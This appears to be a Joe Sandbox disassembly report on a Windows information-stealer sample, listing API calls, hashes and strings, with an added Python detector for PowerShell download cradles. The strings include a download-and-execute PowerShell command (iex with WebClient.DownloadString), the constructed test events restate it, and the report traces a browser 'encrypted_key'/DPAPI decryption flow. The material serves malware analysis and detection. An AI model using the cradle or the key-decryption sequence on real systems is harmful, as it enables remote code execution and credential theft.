                                    • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,0041719A,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000), ref: 00416F4D
                                      • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416BE1
                                      • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416C05
                                    • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C), ref: 00416F92
                                    • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041719A), ref: 004170B3
                                      • Part of subcall function 00416DE0: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00416DF8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: strlen$MemoryProcessQueryReadVirtual
                                    • String ID: @
                                    • API String ID: 2950663791-2766056989
                                    • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                    • Instruction ID: da6ee04ed372484ea639f8c5ae6d2cf8ded6d6947598eb42fecba3fc0a9bdd2e
                                    • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                    • Instruction Fuzzy Hash: 27511CB5E041099BDB04CF98D981AEFBBB5FF88304F108559F919A7340D738EA51CBA5
                                    APIs
                                    • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,00406E2A), ref: 00406A19
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID: *n@$*n@
                                    • API String ID: 1029625771-193229609
                                    • Opcode ID: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                                    • Instruction ID: a280f62563b1b8af23ece619f3fba2aedbd92eaccb2561d1aa32790852693925
                                    • Opcode Fuzzy Hash: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                                    • Instruction Fuzzy Hash: DA71C874A00119DFCB04CF48C484BEAB7B2FB88315F158179E80AAF391D739AA91CB95
                                    APIs
                                    • lstrcat.KERNEL32(?,0064A30C), ref: 007F4A42
                                      • Part of subcall function 007F9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 007F9072
                                    • lstrcat.KERNEL32(?,00000000), ref: 007F4A68
                                    • lstrcat.KERNEL32(?,?), ref: 007F4A87
                                    • lstrcat.KERNEL32(?,?), ref: 007F4A9B
                                    • lstrcat.KERNEL32(?,0064A284), ref: 007F4AAE
                                    • lstrcat.KERNEL32(?,?), ref: 007F4AC2
                                    • lstrcat.KERNEL32(?,0064A2C8), ref: 007F4AD6
                                      • Part of subcall function 007FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 007FA9EF
                                      • Part of subcall function 007F8FF7: GetFileAttributesA.KERNEL32(00000000,?,007E1DBB,?,?,0042565C,?,?,00420E1F), ref: 007F9006
                                      • Part of subcall function 007F47D7: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 007F47E7
                                      • Part of subcall function 007F47D7: RtlAllocateHeap.NTDLL(00000000), ref: 007F47EE
                                      • Part of subcall function 007F47D7: wsprintfA.USER32 ref: 007F480D
                                      • Part of subcall function 007F47D7: FindFirstFileA.KERNEL32(?,?), ref: 007F4824
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                    • String ID:
                                    • API String ID: 2540262943-0
                                    • Opcode ID: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                                    • Instruction ID: 48b8e4e23b5f370f282ea9b76be55c50145a932189c9656e67ce291318fe3fe7
                                    • Opcode Fuzzy Hash: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                                    • Instruction Fuzzy Hash: AE3162FA94020CABDB14FBF0CC8AEF97379AB58700F4045C9B35596181DEB89789CB95
                                    APIs
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00412D85
                                    Strings
                                    • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00412CC4
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412D04
                                    • ')", xrefs: 00412CB3
                                    • <, xrefs: 00412D39
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                    • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    • API String ID: 3031569214-898575020
                                    • Opcode ID: 5f8ae31bfa9754787a169228238118935e8d59a2c42068384eb8c8c7280cf3ad
                                    • Instruction ID: 8aa8f54ed0a99c91faffa02525c95fa844b6858a6ee3c68abfdd9097d7126834
                                    • Opcode Fuzzy Hash: 5f8ae31bfa9754787a169228238118935e8d59a2c42068384eb8c8c7280cf3ad
                                    • Instruction Fuzzy Hash: 08410E71D112089ADB14FBA1C991FDDB774AF10314F50401EE016A7192DF786ADBCFA9
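The function ending at 00412D85 assembles the string fragments listed above (the hardcoded SysWOW64 PowerShell path, `-nop -c "iex(New-Object Net.WebClient).DownloadString('`, a URL, and `')"`) into one command line and passes it to ShellExecuteEx, which is what the "Yara detected Powershell download and execute" signature refers to. The Python below is added here as a detection example; it is not from the report or the sample. It runs over constructed process-creation records (the PIDs, parent names and URLs are invented, and the shape only mimics a Sysmon Event ID 1 / 4688 CommandLine field), flags the download cradle regardless of spacing and case, extracts the URL, and notes two details visible in the strings above: the `-nop` switch and the 32-bit PowerShell path that a 32-bit sample on a 64-bit host ends up launching.

```python
import re
from typing import Optional

# Constructed process-creation events, not taken from the report. The first
# record reproduces the command line the strings at 00412CB3..00412D04 build,
# with a placeholder URL in the position the sample fills at runtime.
SAMPLE_EVENTS = [
    {"pid": 4412, "parent": "ttFpxuMwKz.exe",
     "cmd": 'C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -nop -c '
            '"iex(New-Object Net.WebClient).DownloadString(\'http://example.invalid/stage2.ps1\')"'},
    {"pid": 5120, "parent": "explorer.exe",
     "cmd": 'powershell.exe -NoProfile -Command "Get-Process | Sort-Object CPU"'},
    {"pid": 6001, "parent": "cmd.exe",
     "cmd": 'powershell.exe -nop -w hidden -c '
            '"IEX (New-Object Net.WebClient).DownloadString(\'https://example.invalid/a\')"'},
]

# iex / Invoke-Expression applied to WebClient.DownloadString(<url>), tolerant of
# optional parentheses, whitespace, the System. prefix and mixed case.
CRADLE_RE = re.compile(
    r"""(?ix)
    \b(?:iex|invoke-expression)\s*\(?\s*                      # evaluate the text
    \(?\s*new-object\s+(?:system\.)?net\.webclient\s*\)?      # WebClient instance
    \s*\.\s*downloadstring\s*\(\s*['"](?P<url>[^'"]+)['"]     # fetched URL
    """
)


def inspect_command_line(cmd: str) -> Optional[dict]:
    """Return cradle details for one command line, or None if it does not match."""
    m = CRADLE_RE.search(cmd)
    if not m:
        return None
    lowered = cmd.lower()
    return {
        "url": m.group("url"),
        "no_profile": "-nop" in lowered,                 # -nop / -noprofile
        "hidden_window": "-w hidden" in lowered or "-windowstyle hidden" in lowered,
        "wow64_host": "\\syswow64\\windowspowershell\\" in lowered,
    }


def scan_events(events) -> list:
    """Run inspect_command_line over event records and collect the hits."""
    hits = []
    for ev in events:
        finding = inspect_command_line(ev["cmd"])
        if finding:
            hits.append({"pid": ev["pid"], "parent": ev["parent"], **finding})
    return hits


if __name__ == "__main__":
    for hit in scan_events(SAMPLE_EVENTS):
        print(hit)
```

The regex keys on the combination of an expression evaluator and `DownloadString`, not on `-nop` or the binary path alone, because the latter two are routine in administrative use; the extra fields are there to enrich the alert, and the parent process (here the stealer binary itself) is what an analyst would pivot on next.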
                                    APIs
                                    • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 007E14A5
                                    • __aulldiv.LIBCMT ref: 007E14BF
                                    • __aulldiv.LIBCMT ref: 007E14CD
                                    • ExitProcess.KERNEL32 ref: 007E14FB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                    • String ID: @
                                    • API String ID: 3404098578-2766056989
                                    • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                    • Instruction ID: ca0b3f8bb7031a09c1db49281ea4655532db272b27dcfd858292b368ea5ceea3
                                    • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                    • Instruction Fuzzy Hash: C5016DB0941348FAEF20DBD1CC8AB9DBBB9AB05705F608448F705BB2C1E7B89941C765
                                    APIs
                                    • memcmp.MSVCRT(?,00421264,00000003), ref: 007EA094
                                      • Part of subcall function 007FAA07: lstrcpy.KERNEL32(?,00000000), ref: 007FAA4D
                                      • Part of subcall function 007F0CC7: memset.MSVCRT ref: 007F0E83
                                      • Part of subcall function 007F0CC7: lstrcat.KERNEL32(?,00000000), ref: 007F0E9C
                                      • Part of subcall function 007F0CC7: lstrcat.KERNEL32(?,00420D7C), ref: 007F0EAE
                                      • Part of subcall function 007F0CC7: lstrcat.KERNEL32(?,00000000), ref: 007F0EC4
                                      • Part of subcall function 007F0CC7: lstrcat.KERNEL32(?,00420D80), ref: 007F0ED6
                                      • Part of subcall function 007FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 007FA9EF
                                    • memcmp.MSVCRT(?,00421114,00000003), ref: 007EA116
                                    • memset.MSVCRT ref: 007EA14F
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 007EA1A8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                                    • String ID: @
                                    • API String ID: 1977917189-2766056989
                                    APIs
                                    • strtok_s.MSVCRT ref: 00410DB8
                                    • strtok_s.MSVCRT ref: 00410EFD
                                      • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00A12D90,?,0042110C,?,00000000), ref: 0041A82B
                                      • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: strtok_s$lstrcpylstrlen
                                    • String ID:
                                    • API String ID: 348468850-0
                                    APIs
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                      • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                      • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                      • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                      • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                      • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                      • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                    • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                                      • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                      • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                      • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                      • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                    • memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                                      • Part of subcall function 00409B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                                      • Part of subcall function 00409B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                                      • Part of subcall function 00409B60: memcpy.MSVCRT(?,?,?), ref: 00409BC6
                                      • Part of subcall function 00409B60: LocalFree.KERNEL32(?), ref: 00409BD3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmpmemcpy
                                    • String ID: $"encrypted_key":"$DPAPI
                                    • API String ID: 3731072634-738592651
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CodeInfoPageValidmemset
                                    • String ID:
                                    • API String ID: 703783727-0
                                    APIs
                                    • GetSystemTime.KERNEL32(?), ref: 007F6BD3
                                    • sscanf.NTDLL ref: 007F6C00
                                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 007F6C19
                                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 007F6C27
                                    • ExitProcess.KERNEL32 ref: 007F6C41
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Time$System$File$ExitProcesssscanf
                                    • String ID:
                                    • API String ID: 2533653975-0
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007F809E
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 007F80A5
                                    • RegOpenKeyExA.ADVAPI32(80000002,0064A1D4,00000000,00020119,?), ref: 007F80C5
                                    • RegQueryValueExA.ADVAPI32(?,0064A4EC,00000000,00000000,000000FF,000000FF), ref: 007F80E6
                                    • RegCloseKey.ADVAPI32(?), ref: 007F80F9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 3225020163-0
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417E37
                                    • HeapAlloc.KERNEL32(00000000), ref: 00417E3E
                                    • RegOpenKeyExA.ADVAPI32(80000002,00A15568,00000000,00020119,?), ref: 00417E5E
                                    • RegQueryValueExA.ADVAPI32(?,00A1A100,00000000,00000000,000000FF,000000FF), ref: 00417E7F
                                    • RegCloseKey.ADVAPI32(?), ref: 00417E92
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocCloseOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 3466090806-0
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007F799B
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 007F79A2
                                    • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,007F7920), ref: 007F79C2
                                    • RegQueryValueExA.ADVAPI32(007F7920,00420AAC,00000000,00000000,?,000000FF), ref: 007F79E1
                                    • RegCloseKey.ADVAPI32(007F7920), ref: 007F79EB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 3225020163-0
                                    APIs
                                    • StrStrA.SHLWAPI(00A194C0,?,?,?,0041140C,?,00A194C0,00000000), ref: 0041926C
                                    • lstrcpyn.KERNEL32(0064AB88,00A194C0,00A194C0,?,0041140C,?,00A194C0), ref: 00419290
                                    • lstrlenA.KERNEL32(?,?,0041140C,?,00A194C0), ref: 004192A7
                                    • wsprintfA.USER32 ref: 004192C7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpynlstrlenwsprintf
                                    • String ID: %s%s
                                    • API String ID: 1206339513-3252725368
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007E151B
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 007E1522
                                    • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 007E153E
                                    • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 007E155C
                                    • RegCloseKey.ADVAPI32(?), ref: 007E1566
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 3225020163-0
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                    • HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                    • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                    • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                    • RegCloseKey.ADVAPI32(?), ref: 004012FF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocCloseOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 3466090806-0
                                    APIs
                                    • __getptd.LIBCMT ref: 007FC9B5
                                      • Part of subcall function 007FC206: __getptd_noexit.LIBCMT ref: 007FC209
                                      • Part of subcall function 007FC206: __amsg_exit.LIBCMT ref: 007FC216
                                    • __getptd.LIBCMT ref: 007FC9CC
                                    • __amsg_exit.LIBCMT ref: 007FC9DA
                                    • __lock.LIBCMT ref: 007FC9EA
                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 007FC9FE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                    • String ID:
                                    • API String ID: 938513278-0
                                    APIs
                                    • __getptd.LIBCMT ref: 0041C74E
                                      • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                      • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                                    • __getptd.LIBCMT ref: 0041C765
                                    • __amsg_exit.LIBCMT ref: 0041C773
                                    • __lock.LIBCMT ref: 0041C783
                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 0041C797
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                    • String ID:
                                    • API String ID: 938513278-0
                                    APIs
                                    • StrCmpCA.SHLWAPI(00000000,00A12F10), ref: 0041079A
                                    • StrCmpCA.SHLWAPI(00000000,00A12F90), ref: 00410866
                                    • StrCmpCA.SHLWAPI(00000000,00A12FD0), ref: 0041099D
                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy
                                    • String ID: `_A
                                    • API String ID: 3722407311-2339250863
                                    APIs
                                    • StrCmpCA.SHLWAPI(00000000,00A12F10), ref: 0041079A
                                    • StrCmpCA.SHLWAPI(00000000,00A12F90), ref: 00410866
                                    • StrCmpCA.SHLWAPI(00000000,00A12FD0), ref: 0041099D
